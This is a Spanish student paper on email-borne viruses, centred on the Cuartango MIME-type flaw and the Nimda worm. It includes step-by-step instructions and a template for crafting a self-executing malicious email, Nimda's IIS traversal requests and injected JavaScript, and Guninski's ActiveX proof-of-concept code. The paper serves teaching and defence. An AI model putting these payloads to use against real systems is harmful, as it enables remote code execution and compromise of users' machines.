Cómo entran los virus a través del correo?

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Cómo entran los virus a través del correo?"

Transcripción

1 Ampliación de Redes Cómo entran los virus a través del correo? David Navarro Arnao

2 INTRODUCCIÓN La utilidad de este trabajo trata de ser el de aclarar algunos conceptos sobre los virus informáticos intentando ser un desarrollo del tema de seguridad de la asignatura Ampliación de Redes. Pretende dar una idea general del ámbito de los virus informáticos dando una clasificación de estos y centrándose en un tipo de ellos. Se trata de los virus que se autoejecutan al recibir un correo electrónico, sin ejecutar adjuntos y ni tan siquiera abrirlos, solo con un previsualización pueden infectar nuestro sistema, como el Nimda por ejemplo. Por lo tanto no pretendo que esto sea una extensa guia de los virus y de los fallos de seguridad que aprovechan. En las conclusiones del trabajo se trataran de dar unas pautas de seguridad para evitar ser infectados por estos virus autoejecutables. OBJETIVOS Este trabajo trata de cumplir con los siguientes objetivos: -Presentar una clasificación de los virus. -Particularizar sobre un tipo de virus desarrollando las vulnerabilidades que aprovecha, como lo hace y que posible solución tiene. -Ser un trabajo que complemente el tema de la seguridad dentro de la asignatura Ampliación de Redes. MOTIVACIÓN Y ANTECEDENTES La motivación que ha llevado a desarrollar este trabajo es la curiosidad. La curiosidad de cómo se puede infectar el ordenador al recibir un correo sin realizar ninguna acción de riesgo (aparente), cumpliendo con consejos como el de no abrir ficheros adjuntos o leer el correo off-line. Esta será la pregunta que trataré de responder. El presente trabajo queda fuera del área cubierta por Ampliación de Redes, ya que esta trató sobre el mantenimiento de la seguridad desde el punto de vista de la identidad de la persona. Se quería asegurar que se dialogaba con quien se pretendía y no con un impostor. También se trató de como mantener la información en secreto mediante la criptografía. Otra parte ya más física explicaba el funcionamiento de tarjetas inteligentes y de diseños de firewalls para LAN's para evitar intrusos. Con esto trato de demostrar que la situación del trabajo queda fuera del temario complementándolo.

3 DESARROLLO DEL TRABAJO METODOLOGÍA El punto de partida del trabajo trató de ser los bugs del Outlook Express confiando que diese paso a sus parches y que desde ellos sacase una explicación del fallo. Pero los de Microsoft creen contraproducente que se conozcan los detalles de sus agujeros de seguridad en sus programas. Así que tuve que cambiar de estrategia y le pedí consejo al profesor Carlos Perez que amablemente me dio acceso a su página del seminario sobre seguridad. Esta contenía links de portales sobre seguridad que me han sido muy útiles. El otro camino a seguir era, evidentemente, las páginas de las compañías de antivirus, las cuales dan una idea bastante general del asunto y ofrecen una biblioteca de virus sobre la que me apoye para describir mis ejemplos. Traté de usar bibliografía, pero no pude encontrar nada concreto sobre el tema que he desarrollado, así que toda mi fuente de información se basa en la obtenida de links. DESCRIPCIÓN DEL TRABAJO REALIZADO Tipos de Virus: Los virus que existen en la actualidad, se pueden clasificar o agrupar en función de unas determinadas características. Dependiendo de éstas, algunos de ellos pertenecerán a un determinado grupo, pero otros podrán incluirse en varios de ellos. Algunos de los criterios que se tienen en cuenta a la hora de clasificar a los virus, son los siguientes: -Medio a través del cual realizan su infección. -Técnicas utilizadas para infectar. -Técnicas utilizadas para ocultarse y evitar a los antivirus. -Tipos de archivos que infectan. -Lugares en los que se esconden, tras la infección. -Plataforma o sistema operativo al que atacan A continuación se muestra una clasificación que agrupa parte de los tipos de virus más habituales:

4 1. Virus de Fichero 8. Gusanos 2. Virus Residentes 9. Troyanos (caballos de Troya) 3. Virus de Acción Directa 10. Bombas Lógicas 4. Virus de Sobreescritura 11. Encriptados 5. Virus de Compañia 12. Multipartites 6. Virus de Boot 13. Residentes 7. Virus de Macro 14. Polimórficos La anterior tabla está desarrollada en el Apéndice A con la definición de cada tipo. CÓMO SE INTRODUCEN LOS VIRUS EN NUESTRO PC A TRAVÉS DEL MAIL? Aunque nos parezca que sólo sucede en las películas, lo cierto es que por el mero hecho de visitar una página web o ver (incluso previsualizar) un mail que hayamos recibido, es posible que se esté introduciendo en nuestro PC un programa malicioso, no sólo un gusano (Worm), sino un programa que permite al atacante tener el control total de nuestro PC. Son muchos los bugs que se han encontrado en el Outlook y en el Internet Explorer, que permiten acciones de este tipo, aquí se señalan sólo aquellas que considero mas relevantes, por ahora explico una de las mas sencillas, la de Cuartango, ( que aprovecha un fallo entre el Outlook y el Windows Media Player ), y una de las de Guninski, en el apartado de "Webs infectadas" dentro del manual para el GodWill, en el Apéndice B está el report de Guninski. El español Juan Carlos García Cuartango descubrió el 30 de Marzo del 2001 una vulnerabilidad en el Internet Explorer 5 y en el Outlook que permitía, entre otras cosas introducir en un PC, a través del correo cualquier programa de forma totalmente oculta. El famoso gusano Nimda, que se localizó el , es la motivación del presente trabajo y utiliza este sistema de infección basado en la vulnerabilidad de Cuartango. A continuación se presenta un análisis profundo del funcionamiento de éste gusano. El problema radica en los archivos con extensión.eml. Este tipo de archivos contienen mensajes de correo en formato "MIME Multipart", que es el formato utilizado para enviar cualquier mensaje de correo vía un servidor SMTP. La pregunta es qué tiene eso que ver con el navegador IE?. Pues bien; dicho navegador interpreta ese tipo de archivos para visualizar el contenido de un mensaje de correo. Adjuntando un archivo ejecutable, y mediante una manipulación a través de un trama (<IFRAME>) embebida en el cuerpo del mensaje, el navegador IE ejecutará el código contenido en el archivo adjunto. El asunto parece complicado, pero como un ejemplo vale más que mil palabras, he puesto un ejemplo que obtuve de Kriptópolis. En este caso, inhibir los scripts no soluciona el problema, sino que es necesario descargarse el parche publicado por Microsoft.

5 Existe otra solución, que consiste en la instalación del reproductor Windows Media Player 7 (con el parche que corrige un importante error de dicho software), o del reproductor Real Audio. Ésto también puede sonar incomprensible, pero es que el problema parece radicar en un incorrecto tratamiento de archivos audio por parte del navegador IE, cuando el reproductor de dichos archivos es el estándar Window Media Player 6. Aunque parezca mentira es extremadamente sencillo crear un mail malicioso que introduzca el programa que se desee, estos son los pasos a seguir para comprobar por ti mismo el grave bug de Microsoft: Bájandose el ejemplo de Cuartango *exe.eml* y editándolo con un editor de textos se puede apreciar la siguiente cabecera: From: "xxxxx" Subject: mail Date: Thu, 2 Nov :27: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Sustitúyela por: From: To: Subject: mail Date: Thu, 2 Nov :27: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 <HTML> <HEAD> </HEAD> <BODY bgcolor=3d#ffffff> <iframe src=3dcid:the-cid height=3d0 width=3d0></iframe> I will execute a program<br> </BODY> </HTML> Aquí viene la clave, se puede ver mas abajo la parte que pertenece al archivo adjunto del mail. --1 Content-Type: audio/x-wav; name="hello.exe" Content-Transfer-Encoding: base64 Content-ID: <THE-CID>

6 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA= --1 Todo esta cantidad de letras y símbolos, es el binario que va adjunto en el mensaje, pasado a código BASE 64, pero si nos fijamos vemos que en el campo Content-Type aparece audio/x-wav, lo cual no se corresponde con el verdadero contenido del archivo, y es aquí donde radica el fallo encontrado por Cuartango. Si un atacante se propone introducir en nuestro PC un programa para controlar de forma remota nuestro PC ( un troyano, un servidor de telnet, de FTP, etc ), lo único que debe hacer es sustituir esa cantidad de letras y símbolos que se menciona en el párrafo anterior por otro, que resulte de pasar el programa deseado a BASE 64. Para ello sólo se necesita un programa como el Wincode si usas windows, o simplemente adjuntar dicho programa a un mail, para después editar ese mail y sacarlo de ahí. Una vez que se tenga sólo hay que sustituirlo en el ejemplo. Ahora el mensaje ya está listo para mandar, pero si se intenta mandar con outlook, nos encontramos con el problema de que no permite editar los headers (los encabezados del mensaje), pero si usamos linux no tendremos ningún problema. Bien, esa es la teoría con ejemplo práctico, pero la realidad viene a continuación. ANÁLISIS DEL GUSANO NIMDA El 18 de Septiembre del 2001 (una semana después de los atentados contra las torres de NY) apareció el gusano Nimda, cuando muchos usuarios comunicaron que estaban sufriendo un ataque al servidor de web, al tiempo que advirtieron también, que habían recibido un mail con lo que parecía ser un.wav, la hora de recepción de dicho mail coincidía con el inicio de los ataques de web. Se creyó en un principio que se trataba de una variante del Red Code, pero resultó ser un nuevo gusano llamado Nimda, cuyo nombre oficial es W32/Nimda-A, (NOTA: Nimda es Admin al revés). También se le conoce como: W32.Nimda Worm.Nimda.mm Está programado probablemente en C y afecta a todos los sistemas Microsoft Windows 95, 98, ME, NT, En el copyright del gusano se puede leer "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China.", puede ser cierto o no.

7 que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango, todo ello sin que la víctima se de cuenta. Nimda es un gusano que se propaga de cuatro maneras diferentes: 1º Se envía por mail, con un archivo adjunto llamado "readme.exe" y un subject es variable, utilizando el bug encontrado por Cuartango, el del MIME-type "audio/x-wav", explicado en este trabajo, y gracias al cual se ejecuta el readme.exe adjunto (que acciona la infección) aunque solamente se vea el preview del Outlook o Outlook Express, éstos son vulnerables porque utilizan componentes del Internet Explorer para ver los mensajes con formato HTML. 2º Ataque al Web Server: El gusano busca servidores IIS vulnerables que hayan sido infectados por el Red Code y que tengan abierta la puerta trasera que éste crea, mediante el root.exe. Nimda también trata de acceder a los servidores con IIS mediante los bugs de Unicode y de Decode. Utiliza el bug de Unicode para ejecutar el TFTP y bajarse el archivo "admin.dll" desde el PC atacante, aunque también trata de bajárselo utilizando las puestas traseras dejadas por otros gusanos como el Red Code. 3º Código web: Nimda añade un código en todos los archivos HTM, HTML y ASP que encuentre en el servidor de web, con lo cual, los que visiten esas webs serán también infectados. 4º Nimda se propaga también a través de los recursos compartidos que no hayan sido asegurados, permitiendo el acceso a usuarios no autorizados. Ésto le permite propagarse a través de redes internas. Nimda se copia a si mismo con varios nombres "readme.exe", "readme.eml", "riched20.dll", "admin.dll" porque varias herramientas de oficina, incluidas Microsoft Word y WordPad utilizan el "riched20.dll", el Nimda se copia a esos programas si se ejecutan desde el mismo directorio en el que se encuentra. PORQUÉ ES PELIGROSO EL Nimda? 1º Degrada el funcionamiento de la red debido al alto consumo de ancho de banda durante su propagación, que es extremadamente rápida. 2º Crea o activa la cuenta de "Guest" (invitado) con permisos de Administrador 3º Garantiza el acceso a C:\ como recurso compartido de red, dando acceso a cualquier usuario. 4º Busca ejecutables y DLL los infecta con el gusano. 5º Busca en el disco local archivos del tipo HTM, HTML, ASP y les añade un código JavaScript con el que consigue propagarse, y ejecutar el archivo llamado readme.eml que contiene en el mismo directorio una versión MIME-encoded del Nimda. Este es JavaScript que ejecuta el readme.eml: <html><script language="javascript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> Todo aquel que visite las páginas infectadas con un navegador vulnerable, automáticamente se bajará y ejecutará el gusano. Los archivos.eml (mail) y.nws (news) hacen

8 Todo aquel que visite las páginas infectadas con un navegador vulnerable, automáticamente se bajará y ejecutará el gusano. Los archivos.eml (mail) y.nws (news) hacen que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango, todo ello sin que la víctima se de cuenta. 6º Borra todas las llaves del registro en SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security,con lo que consigue evitar la seguridad de los recursos compartidos de red. 7º Modifica el System.ini gracias a lo cual se ejecuta en cada inicio. Esta es una lista de los ataques que Nimda utiliza para busca otros PC s con vulnerabilidades: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir Estos son los nombres que puede tener el Nimda: readme.exe: Nombre usado en la propagación por readme.eml: Nombre utilizado en la propagación mediante páginas web modificadas. admin.dll: Este nombre es usado durante la transferencia de TFTP desde el PC atacante hasta la victima. Este archivo es copiado al root de todos los discos. Existe un admin.dll válido, porque es parte del FrontPage Server Extensions. mmc.exe: Nombre utilizado por el gusano durante la primera infección. Este archivo está en %Windows%\%System%. "mmc.exe" y es el ejecutable del Microsoft Management Console. El gusano lo sobrescribe si existe. load.exe: Nombre usado por el gusano cuando se copia a si mismo %Windows%\%System%. riched20.dll: El gusano infecta o reemplaza esta DLL. Porque varias herramientas del Office lo utilizan, incluidos Microsoft Word y WordPad, el gusano infecta estos programas si se infectan desde su mismo directorio.

9 Los puertos utilizados son: TCP , 445: NetBIOS. Estos puertos son usados durante la transmisión del gusano. TCP 80: HyperText Transfer Protocol.El gusano lo usa cuando se transporta a través de los HTM HTML o ASP infectados. TCP 25 SMTP: A través de este puerto se mandan los mails. UDP 69 TFTP: Este puerto es el que usa el TFTP cuando el gusano lo ejecuta. CONCLUSIONES Creo que los objetivos que se propusieron para este trabajo han sido cumplidos, teniendo en cuenta cual era la principal motivación del trabajo. Explicar como se pueden infectar nuestros ordenadores a través del correo electrónico procurando una explicación lo más seria posible. Y como limpiarlo. La conclusión a todo esto es que se deben actualizar las versiones de software tanto de audio como de correo electrónico así como seguir consejos de seguridad como el de no abrir adjuntos de desconocidos, leer correo off-line y procurar pasar un antivirus al correo. Lo más increible es que miles de personas hayan sido infectadas por el Nimda cuando Cuartango nos habia advertido un mes antes de la debilidad del software de Microsoft. Pero me temos que esta empresa no tomo las medidas oportunas para evitarlo hasta que el mal estuvo hecho. APÉNDICE A 1. Virus de Fichero: este tipo de virus se encarga de infectar programas o ficheros ejecutables (archivos con extensiones EXE o COM). Al realizar la ejecución de uno de estos programas, de forma directa o indirecta, el virus se activa produciendo los efectos dañinos que le caractericen en cada caso. La mayoría de los virus existentes son de este tipo, pudiéndose clasificar cada uno de ellos en función de las acciones que realizan cada uno de ellos en cada caso. 2.Virus Residentes: cuando se ponen en marcha o activan, la primera acción que realizan consiste en comprobar si se cumplen todas las condiciones (fecha, hora,... etc.) para atacar. De no ser así, se colocan en una zona de la memoria RAM, esperando que se ejecute algún programa. Si en alguna de las operaciones que realiza el sistema operativo se trabajase con un fichero ejecutable no infectado, el virus lo infectará. Para ello, el virus se añadirá al programa que infecta, añadiendo su código al propio código del fichero ejecutable. Algunos virus de este tipo realizan modificaciones en la configuración del sistema (en el Registro de Windows, entre otros), para volver a colocarse en la memoria como residentes, siempre que se vuelva a encender o reiniciar el ordenador. Desde su condición de residentes, interceptarán determinados servicios del sistema operativo. Dichos servicios pueden ser utilizados por los programas, cuando se están ejecutando. Esto quiere decir que los virus residentes podrán interferir en las acciones que lleven a cabo los programas que se estén ejecutando en un determinado momento. El resultado es que el virus puede alterar los servicios que necesita el programa, para que apunten o ejecuten partes del código correspondiente al propio virus. Esto implica que el virus residente se ejecutará siempre que un programa necesite y acceda a los servicios del sistema operativo.

10 que lleven a cabo los programas que se estén ejecutando en un determinado momento. El resultado es que el virus puede alterar los servicios que necesita el programa, para que apunten o ejecuten partes del código correspondiente al propio virus. Esto implica que el virus residente se ejecutará siempre que un programa necesite y acceda a los servicios del sistema operativo. Ejemplos de virus famosos de este tipo son el Barrotes o el Viernes Virus de Acción Directa: en el momento de su ejecución, el virus trata de replicarse, o reproducirse. Cumpliéndose unas determinadas condiciones, particulares y específicas en cada caso, se activará y pasará a realizar infecciones dentro del directorio o carpeta en el que nos encontremos y dentro de los directorios que se encuentran especificados en la línea PATH dentro del fichero AUTOEXEC.BAT. Este tipo de virus puede ser considerado como un virus de fichero ya que buscan ficheros que puedan ser sus víctimas, para infectarlos. El motivo de que estos virus realicen copias de sí mismos o se reproduzcan, es debido a que no son residentes y por lo tanto no permanecen ejecutándose en memoria. Esto les obliga a reproducirse y actuar directamente. 4. Virus de Sobreescritura: este tipo de virus se caracteriza por no respetar la información contenida en los ficheros que infecta, haciendo que estos queden inservibles posteriormente. Pueden encontrarse virus de sobreescritura que además son residentes y otros que no lo son. Aunque la desinfección es posible, no existe posibilidad de recuperar los ficheros infectados, siendo la única alternativa posible la eliminación de éstos. Este tipo de virus puede ser considerado como virus de fichero. Una característica interesante es que los ficheros infectados por virus de sobreescritura, no aumentan de tamaño, a no ser que el virus ocupe más espacio que el propio fichero infectado. Esto es debido a que dicho tipo de virus se coloca encima del contenido del fichero infectado, no se incluye de forma adicional en una sección del mismo. 5. Virus de Compañía: Al contrario que los virus de sobreescritura o que los residentes, los virus de compañía no modifican los ficheros que infectan. Cuando el sistema operativo está trabajando puede ocurrir que éste tenga que ejecutar un programa con un nombre determinado. Si existen dos ficheros ejecutables con el mismo nombre pero con diferentes extensiones, el sistema operativo ejecutará en primer lugar el que lleve la extensión COM. Esta peculiaridad del sistema operativo es aprovechada por los virus de compañía. En caso de existir un fichero ejecutable con un determinado nombre y extensión EXE, el virus se encargará de crear otro fichero con el mismo nombre pero con extensión COM haciéndolo invisible al usuario para evitar levantar sospechas. Tras realizarse la ejecución del fichero COM correspondiente al virus, éste devuelve el control al sistema operativo para que ejecute el fichero EXE. De esta forma el usuario no tendrá conocimiento de la infección que en ese preciso instante ha tenido lugar. En definitiva, un virus de compañía, seguirá los siguientes pasos: 6. Virus de Boot (sector de arranque): Este tipo de virus, no afectan a los ficheros por lo que el contenido del disco no estará en peligro a no ser que se intente arrancar el ordenador con dicho disco. Si esto ocurre, el virus realizará la infección siguiendo una serie de pasos habituales: Se oculta en un determinado sector del disco infectado. Reserva un determinado espacio en memoria para que éste no sea ocupado por ningún otro programa.

11 los programas y directorios para provocar la infección de un determinado fichero. Si un programa se encuentra en una dirección concreta, para ejecutarlo habrá que acceder a dicha dirección. Sin embargo, el virus de enlace o directorio la habrá modificado con Reserva un determinado espacio en memoria para que éste no sea ocupado por ningún otro programa. Se coloca en esa zona reservada de la memoria. Desde esa posición de memoria, intercepta servicios del sistema operativo. A partir de este momento, ocurrirá lo siguiente: Siempre que una aplicación del sistema operativo llame a una función de acceso a ficheros, el virus toma el control. Se comprueba si el disco al que se accede esta infectado. Si no lo está, lo infecta. El virus vuelve a colocar el sector de arranque original (sin infectar). Se modifica el boot original, escribiendo el código vírico en él. De esta forma el virus cede el control al sistema operativo. Así parecerá no haber ocurrido nada. Si introducimos un disquete infectado en un ordenador, la infección podría extenderse al disco duro. En tal caso, se vería afectado el MBR (Master Boot Record) del disco duro. Esto implica que todos los tipos de discos (disquete, CD-ROM, unidades Zip, Unidades Jazz,...) que utilicemos posteriormente en el ordenador infectado, serán igualmente infectados. Estos virus se encargan de guardar una copia del Boot original, pero cada uno de ellos lo puede hacer de una forma diferente. Algunos los copiarán en una determinada sección del disco y la marcarán como defectuosa. Otros lo almacenan en una sección del disco donde ya hubiese información, perdiéndose esta (y siendo imposible de recuperar dicha información). Finalmente los más agresivos o peligrosos sobreescriben el boot original, impidiendo el arranque del ordenador con dicho disco. 7. Virus de Macro: los virus de macro realizan infecciones sobre los ficheros (documentos, libros, presentaciones y/o bases de datos) que se han creado con determinadas aplicaciones. Cada uno de estos tipos de ficheros puede tener adicionalmente unos pequeños programas, denominados macros. Una macro no es más que un micro-programa que el usuario asocia al fichero que ha creado con determinadas aplicaciones. Éste no depende del sistema operativo sino de acciones determinadas que el usuario puede realizar dentro del documento que la contiene. Mediante ellos es posible automatizar conjuntos de operaciones para que se lleven a cabo como una sola acción del usuario de forma independiente sin necesidad de realizarlas una a una manualmente. Pues bien, estas macros podrían infectarse. En este caso, al abrir un documento que contenga macros, éstas se cargarán de forma automática. Entonces el virus actuará. Al diferencia de lo que se piensa habitualmente, los virus de macro pueden realizar acciones dañinas de bastante importancia, propagándose en poco tiempo de forma muy rápida. Las aplicaciones afectadas son Microsoft Word, Excel, Access, Powerpoint, Multi Macro Partite, Lotus Ami Pro y Corel Draw. Ejemplos famosos son: Melissa, Lewinsky, Y2K. 8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de

12 8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de los programas y directorios para provocar la infección de un determinado fichero. Si un programa se encuentra en una dirección concreta, para ejecutarlo habrá que acceder a dicha dirección. Sin embargo, el virus de enlace o directorio la habrá modificado con anterioridad. Lo que hace es alterar esta dirección (dentro de la FAT) para que apunte al lugar en el que se encuentra el virus, guardando en otro lugar la dirección de acceso correcta. De esta forma, cuando se pretenda ejecutar el fichero, lo que se hará realmente es ejecutar el virus. Ya que este tipo de virus puede modificar las direcciones donde se encuentran todos los ficheros del disco (disco duro), su capacidad para infectar TODOS éstos es real. De este modo, los virus de enlace o directorio pueden infectar toda la información contenida en un disco, pero les es imposible realizar infecciones en unidades de red o agregarse a los ficheros infectados. En caso de realizar un análisis del disco en busca de errores (mediante programas como SCANDISK o CHKDSK), se detectarán grandes cantidades de errores que identifican todos los enlaces a los ficheros que el virus ha modificado. No obstante, en este caso sería mejor no recuperarlos ya que podría producirse un caos en lo que al sistema de almacenamiento de la información se refiere, que sería más perjudicial si cabe. 9. Gusanos (Worms): los gusanos se diferencian de los virus en que no intentan infectar otros ficheros. Su único objetivo es propagarse o expandirse a otros ordenadores de la forma más rápida posible. Por otra parte, emplean técnicas para replicarse (propagarse). En realidad su objetivo es crear copias de sí mismos y con ellas realizar infecciones en otros ordenadores. Las infecciones producidas o reproducciones que éstos realizan casi siempre a través de medios como el correo electrónico, las redes de ordenadores y los canales de IRC en Internet. También es posible que se repliquen dentro de la memoria del PC. Cuando un gusano es ejecutado, permanece así hasta que se apaga o se reinicia el ordenador. No obstante cada uno de ellos utiliza técnicas diferentes para asegurar su ejecución siempre que se arranca el ordenador y se entra en Windows. Por ejemplo la modificación del Registro de Windows. Por otra parte, podría darse en caso de que el gusano estuviese compuesto por varios programas. En tal caso, cada uno de ellos actuará de forma subordinada a uno de éstos que se considerará principal. Esta variación, suele ser denominado como gusano de red. Dependiendo del lenguaje en el que estén escritos, las técnicas utilizadas para propagarse y otras características, los gusanos pueden ser de varios tipos: Gusanos de correo electrónico. Son gusanos que se propagan a través de mensajes de correo electrónico, mediante la utilización de programas clientes de correo. Gusanos de IRC (gusanos de mirc y de Pirch). Son gusanos que se propagan a través de canales de IRC (Chat). Los programas de IRC que emplean habitualmente para ello, son mirc y Pirch. Gusanos de VBS (Visual Basic Script). Son gusanos escritos o creados en Visual Basic Script. Gusanos de Windows32. Son gusanos que se propagan a través de las API de Windows (las funciones pertenecientes a un determinado protocolo de Internet).

13 Ejemplos de este tipo de virus son: Happy99, Pretty Park, I love you, etc Troyanos (Caballos de Troya): los troyanos no se pueden considerar virus como tales. Recogen su nombre de la mitología (el famoso caballo de madera en el que se escondieron los soldados para entrar a la ciudad de forma aparentemente inofensiva, cuando lo que pretendían era realmente hacerse con ella). Del mismo modo funcionan los troyanos. Éstos parecen ser programas inofensivos que llegan a nuestro ordenador por cualquier medio. Cuando ejecutamos este programa (llevarán nombres o tendrán características que nos incitarán a ello), se instalará en nuestro ordenador otro programa que podrá producir efectos destructivos. En un principio, el troyano podría no activar sus efectos. De todas formas, cuando esto ocurra, se podrán eliminar ficheros, perder la información del disco duro, o abrirse los posibles huecos de seguridad a modo de puestas traseras (backdoor) por las que nuestro equipo podría ser atacado. La mayoría de ellos se encargan de acceder a determinados puertos de comunicaciones y abrirlos o dejarlos accesibles desde el exterior. En tal caso, a través de una conexión (en una red local o a través de Internet) alguien podría acceder a toda la información contenida en nuestro equipo, enviar esta información a otras direcciones y realizar cualquier tipo de operación sin nuestro consentimiento. 11. Bombas Lógicas: éstos se encargan de activarse y producir destrozos de consideración en el equipo al que han infectado, sólo cuando se cumple/n una/s determinada/s condición/es. No se consideran virus como tales, ya que no se reproducen, sino que dependen de las acciones realizadas que lleve a cabo el usuario (éste debe copiarlos y/o ejecutarlos, de forma generalmente no intencionada). 12. Encriptados: más que un tipo de virus, se trata de una técnica que éstos pueden utilizar. Por este motivo, los virus que la utilizan (pudiendo pertenecer a otros tipos o categorías), se suelen denominar también encriptados. Esto es, el virus se cifra, codifica o "encripta" a sí mismo para no ser fácilmente detectado por los programas antivirus. Para realizar sus actividades, el virus se descifra a sí mismo y cuando ha finalizado, se vuelve a cifrar. 13. Multipartites: este tipo de virus pueden realizar múltiples infecciones y hacerlo además utilizando diferentes técnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos,... etc. Se consideran bastante peligrosos por su capacidad de combinar muchos técnicas de infección y las acciones que pueden llegar a realizar. 14. Polimórficos: son virus que emplean una nueva técnica para dificultar su detección por parte de los programas antivirus (generalmente, son los virus que más cuesta detectar). En este caso varían en cada una de las infecciones que llevan a cabo. De esta forma, generan una elevada cantidad de copias de sí mismos. Los virus polimórficos se encriptan o cifran de forma diferente (utilizando diferentes algoritmos y claves de cifrado), en cada una de las infecciones que realizan. Esto hace que no se puedan detectar a través de la búsqueda de cadenas o firmas (ya que éstas serán diferentes en cada cifrado).

14 APÉNDICE B Georgi Guninski security advisory #23, 2000 IE 5.5/Outlook security vulnerability - com.ms.activex.activexcomponent allows executing arbitrary programs Systems affected: IE 5.5/Outlook/Outlook Express - probably other versions, have not tested Risk: High Date: 5 October 2000 Legal Notice: This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: Internet Explorer 5.5/Outlook allow executing arbitray programs after viewing web page or message. This may lead to taking full control over user's computer. Details: The problem is the com.ms.activex.activexcomponent java object which may be instantiated from <APPLET> tag (it throws security exception in java console, but returns object, strange). The com.ms.activex.activexcomponent java object allows creating and scripting arbitrary ActiveX objects, including those not marked safe for scripting. Examine the code below for more information. The code is: javaea.html <APPLET code="com.ms.activex.activexcomponent" > </APPLET> <!-- ^^^ This gives java exceptions in java console, but the object is instantiated --> <SCRIPT LANGUAGE="JAVASCRIPT"> a1=document.applets[0];

15 fn="..\\\\start Menu\\\\Programs\\\\Startup\\\\EA.HTA"; //fn="ea.hta"; doc="<script>s1=\'hello world\\nto get rid of this, delete the file EA.HTA in Startup folder\';alert(s1);document.body.innerhtml=s1</"+"script>"; function f1() { a1.setproperty('doc',doc); } function f() { // The ActiveX classid cl="{06290bd5-48aa-11d c3fbfc}"; a1.setclsid(cl); a1.createinstance(); settimeout("a1.setproperty('path','"+fn+"')",1000); settimeout("f1()",1500); settimeout("a1.invoke('write',va);alert('"+fn+" created');",2000); } settimeout("f()",1000) </SCRIPT> <SCRIPT LANGUAGE="VBSCRIPT"> VA = ARRAY() ' Just to get something like com.ms.com.variant[] </SCRIPT> Regarding this issue and Outlook with "security update" (probably this should be another advisory). It is a bit more difficult to exploit this from Outlook because of the "Outlook security update" which stops "most scripting". It is common misbelief that the "Outlook security update" stops all scripting, but this is not true. It is possible to trigger the execution of Active Script from message with the help of Java. Send a message containing <IFRAME SRC="http://somehost/javascript.html"></IFRAME> javascript.html <APPLET CODE="outlookjs.class" MAYSCRIPT> <PARAM NAME="command" VALUE="window.open('http://www.guninski.com')"> </APPLET> outlookjs.java import java.applet.applet; import netscape.javascript.*; class outlookjs extends Applet { public JSObject j; public void init() { try { j=(jsobject) JSObject.getWindow(this);

16 j.eval(getparameter("command")); } catch (Exception e) {System.out.println(e);}; } } Workaround: Disable Active Scripting or Java or Scripting of Java applets - better disable all active content in IE. Demostration that executes programs is available Demostration that places a file on Desktop is available APÉNDICE C Desinfección del Nimda: Los pasos para desinfectar el Nimda han sido sacados de la Incidents Mailing list de Jeffrey Isherwood Reparar las llaves modificadas del registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ HideFileExt HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ HideFileExt HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ Hidden HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ ShowSuperHidden El Nimda crea la siguiente llave: HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfac es Todas las claves de la siguiente llave son borradas para desactivar la seguridad de los recursos compartidos: HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Sec urity Borra la siguiente linea del system.ini y reinicia el PC: [boot] shell=explorer.exe load.exe -dontrunold Los siguientes archivos son infectados por el Nimda, debes borrarlos y reponerlos de otro PC o de un Backup

